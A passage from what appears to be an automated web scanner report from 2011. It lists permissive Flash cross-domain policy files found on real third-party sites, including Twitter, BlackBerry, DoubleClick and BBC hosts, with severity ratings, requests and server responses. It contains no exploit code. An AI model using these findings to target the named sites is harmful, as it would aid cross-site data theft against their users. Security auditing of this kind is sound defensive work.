Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:06:17 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:04:08 GMT
Cache-Control: max-age=1800
Expires: Sat, 14 May 2011 18:36:17 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 905016961
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-23-sr4.prod.twitter.com
X-Cache: MISS
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.29. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:34:15 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sat, 21 May 2011 22:34:15 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

7.30. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 14 May 2011 14:35:06 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

7.31. https://tt3.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://tt3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tt3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=86400
Date: Sat, 14 May 2011 14:13:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.32. http://us.blackberry.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.blackberry.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
ETag: W/"213-1271207419000"
Last-Modified: Wed, 14 Apr 2010 01:10:19 GMT
Content-Type: text/xml;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 14 May 2011 14:23:30 GMT
Date: Sat, 14 May 2011 14:23:30 GMT
Content-Length: 213
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-d
...[SNIP]...

7.33. http://www.blackberry.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:23:24 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 21:59:07 GMT
ETag: "14eadd1-c7-496d91d17a0c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.34. http://www.vizury.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vizury.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vizury.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:58:38 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 18 Feb 2011 23:30:51 GMT
ETag: "e3db-144-49c96e79260c0"
Accept-Ranges: bytes
Content-Length: 324
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.35. http://yads.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yads.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: yads.zedo.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:14:00 GMT
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:05:58 GMT
ETag: "289991e-f7-44d91abfe2980"
Accept-Ranges: bytes
Content-Length: 247
Edge-Control: dca=esi, !no-store
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.36. http://yatra.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yatra.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: yatra.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:35:51 GMT
Server: Omniture DC/2.0.0
xserver: www24
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.37. http://ads.adsonar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adsonar.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:29:21 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=973
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

7.38. http://ads.bridgetrack.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 810
Content-Type: text/html
Date: Sat, 14 May 2011 13:58:40 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
   <allow-access-from domain="travelerssaves.com" />
   <allow-access-from domain="moneyneedsattention.com" />
   <allow-access-from domain="www.moneyneedsattention.com"/>
   <allow-access-from domain="portal.kaplan.edu" />
   <allow-access-from domain="www.portal.kaplan.edu"/>
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...

7.39. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 14 May 2011 22:29:10 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Sat, 14 May 2011 22:31:39 +0000 GMT
Etag: 25cf8308a31d3f8c3d709a6ab6e0ae9d
X-Served-By: ded2060

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

7.40. http://buyonline.aegonreligare.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://buyonline.aegonreligare.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: buyonline.aegonreligare.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 426
Content-Type: text/xml
Last-Modified: Sun, 23 Jan 2011 13:01:36 GMT
Accept-Ranges: bytes
ETag: "0f87caafdbacb1:e6c"
Server: Microsoft-IIS/6.0
Date: Sat, 14 May 2011 14:12:48 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.localhost" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.127.0.0.0" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mds" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.192.168.1.35" secure="false"/>
...[SNIP]...

7.41. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sat, 14 May 2011 14:03:58 GMT
Date: Sat, 14 May 2011 14:01:58 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

7.42. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 14 May 2011 10:44:18 GMT
Expires: Sun, 15 May 2011 10:44:18 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 11665
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.43. https://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 14 May 2011 03:35:59 GMT
Expires: Sun, 15 May 2011 03:35:59 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 44940

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.44. http://js.adsonar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Sat, 14 May 2011 22:59:21 GMT
Date: Sat, 14 May 2011 22:29:21 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

7.45. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

